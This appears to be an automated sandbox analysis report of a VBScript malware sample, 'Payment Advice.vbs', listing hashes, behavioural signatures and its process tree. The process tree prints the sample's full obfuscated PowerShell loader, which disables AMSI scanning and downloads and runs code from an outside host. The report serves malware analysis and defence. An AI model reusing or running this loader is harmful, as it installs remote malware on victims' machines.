Analysis
-
max time kernel
15s -
max time network
131s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
21-01-2021 06:21
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice.vbs
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Payment Advice.vbs
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
Payment Advice.vbs
-
Size
4KB
-
MD5
afccc71a981fa3ea99bf0af6cbbfac4d
-
SHA1
125e81caad716d88d4be375c125156a673d1ecb0
-
SHA256
6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6
-
SHA512
0ea2d841cb7f3a55a6304b1784adecc7e87aa43676583c67084dafe2d702267165873031ac3fd2f5e7aced18aba36a6a5283b03eca2cb754a75fb0ce65955fdd
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 3736 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3736 powershell.exe 3736 powershell.exe 3736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3736 powershell.exe Token: SeIncreaseQuotaPrivilege 3736 powershell.exe Token: SeSecurityPrivilege 3736 powershell.exe Token: SeTakeOwnershipPrivilege 3736 powershell.exe Token: SeLoadDriverPrivilege 3736 powershell.exe Token: SeSystemProfilePrivilege 3736 powershell.exe Token: SeSystemtimePrivilege 3736 powershell.exe Token: SeProfSingleProcessPrivilege 3736 powershell.exe Token: SeIncBasePriorityPrivilege 3736 powershell.exe Token: SeCreatePagefilePrivilege 3736 powershell.exe Token: SeBackupPrivilege 3736 powershell.exe Token: SeRestorePrivilege 3736 powershell.exe Token: SeShutdownPrivilege 3736 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeSystemEnvironmentPrivilege 3736 powershell.exe Token: SeRemoteShutdownPrivilege 3736 powershell.exe Token: SeUndockPrivilege 3736 powershell.exe Token: SeManageVolumePrivilege 3736 powershell.exe Token: 33 3736 powershell.exe Token: 34 3736 powershell.exe Token: 35 3736 powershell.exe Token: 36 3736 powershell.exe Token: SeIncreaseQuotaPrivilege 3736 powershell.exe Token: SeSecurityPrivilege 3736 powershell.exe Token: SeTakeOwnershipPrivilege 3736 powershell.exe Token: SeLoadDriverPrivilege 3736 powershell.exe Token: SeSystemProfilePrivilege 3736 powershell.exe Token: SeSystemtimePrivilege 3736 powershell.exe Token: SeProfSingleProcessPrivilege 3736 powershell.exe Token: SeIncBasePriorityPrivilege 3736 powershell.exe Token: SeCreatePagefilePrivilege 3736 powershell.exe Token: SeBackupPrivilege 3736 powershell.exe Token: SeRestorePrivilege 3736 powershell.exe Token: SeShutdownPrivilege 3736 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeSystemEnvironmentPrivilege 3736 powershell.exe Token: SeRemoteShutdownPrivilege 3736 powershell.exe Token: SeUndockPrivilege 3736 powershell.exe Token: SeManageVolumePrivilege 3736 powershell.exe Token: 33 3736 powershell.exe Token: 34 3736 powershell.exe Token: 35 3736 powershell.exe Token: 36 3736 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WScript.exedescription pid process target process PID 4804 wrote to memory of 3736 4804 WScript.exe powershell.exe PID 4804 wrote to memory of 3736 4804 WScript.exe powershell.exe PID 4804 wrote to memory of 3188 4804 WScript.exe cmd.exe PID 4804 wrote to memory of 3188 4804 WScript.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-PSReadlineOption -HistorySaveStyle SaveNothing;$RtTaPrCxkdwhsjhbPUin='Q4)QF)20)7B)24)70)Q9)QE)Q7)20)3D)20)74)QO)73)74)2D)Q3)QF)QE)QE)QO)Q3)74)Q9)QF)QE)20)2D)Q3)QF)QD)70)20)Q7)QF)QF)Q7)QC)QO)2E)Q3)QF)QD)20)2D)Q3)QF)7O)QE)74)20)31)20)2D)O1)7O)Q9)QO)74)7D)20)7O)QE)74)Q9)QC)20)28)24)70)Q9)QE)Q7)29)3B)24)74)3O)3Q)QQ)Q7)20)3D)20)OB)4O)QE)7O)QD)OD)3A)3A)O4)QF)4F)Q2)QA)QO)Q3)74)28)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)O4)79)70)QO)OD)2C)20)33)30)37)32)29)3B)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)72)7Q)Q9)Q3)QO)O0)QF)Q9)QE)74)4D)Q1)QE)Q1)Q7)QO)72)OD)3A)3A)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)20)3D)20)24)74)3O)3Q)QQ)Q7)3B)OB)O2)QO)QQ)OD)2E)41)73)73)QO)QD)Q2)QC)79)2E)47)QO)74)O4)79)70)QO)28)27)O3)79)27)2B)27)73)74)QO)QD)2E)27)2B)27)4D)Q1)QE)Q1)27)2B)27)Q7)QO)QD)27)2B)27)QO)QE)74)27)2B)27)2E)41)7O)74)QF)QD)27)2B)27)Q1)74)Q9)QF)27)2B)27)QE)2E)41)27)2B)27)QD)27)2B)27)73)Q9)27)2B)27)OO)74)Q9)QC)73)27)29)2E)47)QO)74)4Q)Q9)QO)QC)Q4)28)27)Q1)27)2B)27)QD)73)27)2B)27)Q9)49)27)2B)27)QE)Q9)74)4Q)Q1)27)2B)27)Q9)QC)QO)Q4)27)2C)27)4E)QF)QE)40)40)40)27)2E)72)QO)70)QC)Q1)Q3)QO)28)27)40)40)40)27)2C)27)O0)7O)Q2)27)29)2B)27)QC)Q9)Q3)2C)O3)27)2B)27)74)Q1)74)Q9)Q3)27)29)2E)O3)QO)74)OQ)Q1)QC)7O)QO)28)24)QE)7O)QC)QC)2C)24)74)72)7O)QO)29)3B)24)74)74)79)3D)27)28)4E)QO)77)2D)27)2B)27)4F)Q2)QA)QO)27)2B)27)Q3)74)20)4E)QO)27)2B)27)74)2E)O7)QO)27)2B)27)Q2)43)QC)Q9)27)2B)27)QO)QE)74)29)27)7C)49)Q0)4O)Q0)O8)3B)OB)7Q)QF)Q9)Q4)OD)20)OB)O3)79)73)74)QO)QD)2E)O2)QO)QQ)QC)QO)Q3)74)Q9)QF)QE)2E)41)73)73)QO)QD)Q2)QC)79)OD)3A)3A)4C)QF)Q1)Q4)O7)Q9)74)Q8)O0)Q1)72)74)Q9)Q1)QC)4E)Q1)QD)QO)28)27)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)27)29)3B)24)QD)7Q)3D)20)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)49)QE)74)QO)72)Q1)Q3)74)Q9)QF)QE)OD)3A)3A)43)Q1)QC)QC)42)79)QE)Q1)QD)QO)28)24)74)74)79)2C)27)44)QF)77)QE)QC)QF)Q1)Q4)O3)74)72)Q9)QE)Q7)27)2C)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)43)Q1)QC)QC)O4)79)70)QO)OD)3A)3A)4D)QO)74)Q8)QF)Q4)2C)27)Q8)74)74)70)3A)2F)2F)Q1)Q3)Q8)2D)QO)Q4)Q9)2E)78)79)7A)2F)4D)QF)QE)74)Q8)QC)79)O0)Q1)79)72)QF)QC)QC)2F)4A)Q1)QE)7O)Q1)72)79)2E)QA)70)Q7)27)29)3B)24)72)37)38)QQ)Q4)30)30)30)73)Q4)3D)20)24)QD)7Q)20)2D)73)70)QC)Q9)74)20)27)2O)27)20)7C)4Q)QF)72)4O)Q1)Q3)Q8)2D)4F)Q2)QA)QO)Q3)74)20)7B)OB)Q3)Q8)Q1)72)OD)OB)Q2)79)74)QO)OD)22)30)78)24)OF)22)7D)3B)24)79)3O)QA)Q8)3Q)32)Q4)QQ)30)3D)20)24)72)37)38)QQ)Q4)30)30)30)73)Q4)20)2D)QA)QF)Q9)QE)20)27)27)7C)49)Q0)4O)Q0)O8'.replace('O','5').replace('Q','6');$DFG45DFG0=$RtTaPrCxkdwhsjhbPUin.Split(')') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs" "C:\Users\Admin\AppData\Local" /Y2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3188-3-0x0000000000000000-mapping.dmp
-
memory/3736-2-0x0000000000000000-mapping.dmp
-
memory/3736-4-0x00007FFA610F0000-0x00007FFA61ADC000-memory.dmpFilesize
9.9MB
-
memory/3736-5-0x00000161E42D0000-0x00000161E42D1000-memory.dmpFilesize
4KB
-
memory/3736-6-0x00000161E4400000-0x00000161E4401000-memory.dmpFilesize
4KB
-
memory/3736-7-0x00000161E4250000-0x00000161E4251000-memory.dmpFilesize
4KB
-
memory/3736-8-0x00000161E2210000-0x00000161E2212000-memory.dmpFilesize
8KB
-
memory/3736-9-0x00000161E2213000-0x00000161E2215000-memory.dmpFilesize
8KB
-
memory/3736-10-0x00000161E2216000-0x00000161E2218000-memory.dmpFilesize
8KB